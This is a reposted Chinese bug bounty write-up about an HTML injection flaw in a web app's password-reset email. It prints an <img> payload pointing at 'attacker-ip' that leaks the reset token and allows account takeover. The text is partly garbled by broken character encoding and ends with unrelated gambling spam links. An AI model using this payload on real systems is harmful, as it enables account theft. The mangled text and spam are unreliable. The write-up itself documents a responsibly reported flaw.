<dl id="wqg5j"></dl>

    1. <menuitem id="wqg5j"></menuitem>

      <dl id="wqg5j"><font id="wqg5j"></font></dl>
    2. <dl id="wqg5j"><ins id="wqg5j"></ins></dl>
    3. <dl id="wqg5j"><ins id="wqg5j"><thead id="wqg5j"></thead></ins></dl>
      <li id="wqg5j"><ins id="wqg5j"></ins></li>
      安基网 首页 安全 Web安全 查看内容

      “找回密码”邮件骚操作之帐户接管

      2019-4-24 17:35| 投稿: lofor |来自: 互联网


      免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和?#35745;?#29256;权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

      摘要: 在这篇文章中,我将讲述我在某个网络应用中所找到的逻辑漏洞,它存在于“找回密码”这个功能中,可以让我接管?#25105;?#29992;户的帐号。虽然最后进行攻击的方式是通过钓鱼手段,但这个漏洞依然有足够的威胁。以下我将目标称为“app”。

      在这篇文章中,我将讲述我在某个网络应用中所找到的逻辑漏洞,它存在于“找回密码”这个功能中,可以让我接管?#25105;?#29992;户的帐号。虽然最后进行攻击的方式是通过钓鱼手段,但这个漏洞依然有足够的威胁。以下我将目标称为“app”。

      当我在测试这个应用的“忘记密码”功能?#20445;?#20351;用burpsuite抓到了这样一个特殊的HTTP数据包:

      在这个请求的多个?#38382;?#20013;,你应?#27809;?#31435;马注意到一个特殊的?#38382;?code style="box-sizing: border-box; font-family: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace; font-size: 14px; color: rgb(232, 62, 140); word-break: break-word;">emailBody,貌似其中掺杂了很多html代码,这可能涉及到找回密码的某个web模板。让我们先测试一下,看是否可以往其中注入html代码。

      我先简单的插入了一个<a>标签,回应如下(即重置密码的邮件):

      很好,我们在重置密码的链接?#23433;?#20837;了一个click,看样子这是一个标准的HTML注入,后端服务器并没有对用户的数据进行安全过滤就直接利用。那么,它在?#23548;是?#20917;下能达到什么攻击效果呢?我很快想到也许可以试试?#20113;?#20182;用户进行钓鱼攻击,毕竟这个邮件的发送者可是应用官方。

      实现这个钓鱼攻击,只需插入一个简单的url即可(插入位置在[RESET-LINK]之前):

      <img src=\"http://attacker-ip/?id=
      

      一旦受害者打开这封“找回密码”的电子邮件,<img>标签?#31361;?#21521;我的服务器发出请求,而重置密码令牌?#19981;?#34987;带到我的服务器上,具体如下图所示:

      攻击者可以轻松使用得到的令牌重置密码,接管?#25105;?#24080;户。

       

      时间线

      • 2019年1月8日 – 报告漏洞
      • 2019年1月10日 – 检验中
      • 2019年1月10日 – 支付赏金


      小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培?#21040;?#31243;免费学,让您少走弯路、事半功倍,好工作升职?#26377;劍?/font>



      免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和?#35745;?#29256;权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


      鲜花

      ?#24080;?/a>

      雷人

      路过

      鸡蛋

      相关阅读

      最新评论

       最新
      返回顶部
      玄机图
      <dl id="wqg5j"></dl>

        1. <menuitem id="wqg5j"></menuitem>

          <dl id="wqg5j"><font id="wqg5j"></font></dl>
        2. <dl id="wqg5j"><ins id="wqg5j"></ins></dl>
        3. <dl id="wqg5j"><ins id="wqg5j"><thead id="wqg5j"></thead></ins></dl>
          <li id="wqg5j"><ins id="wqg5j"></ins></li>
          <dl id="wqg5j"></dl>

            1. <menuitem id="wqg5j"></menuitem>

              <dl id="wqg5j"><font id="wqg5j"></font></dl>
            2. <dl id="wqg5j"><ins id="wqg5j"></ins></dl>
            3. <dl id="wqg5j"><ins id="wqg5j"><thead id="wqg5j"></thead></ins></dl>
              <li id="wqg5j"><ins id="wqg5j"></ins></li>
              sungame娱乐21点 幸运农场开奖结果查询 体彩网顶呱刮nba 云南快乐10分中奖规则 网易彩票中奖纪录 青海淘宝快3 篮彩网 足球比分直播吧 平特肖计算公式 福建快三今日走势图 福彩3d巨奖排行榜 49期开奖结果 中币网提现手续费多少 英超足球宝贝 福彩计划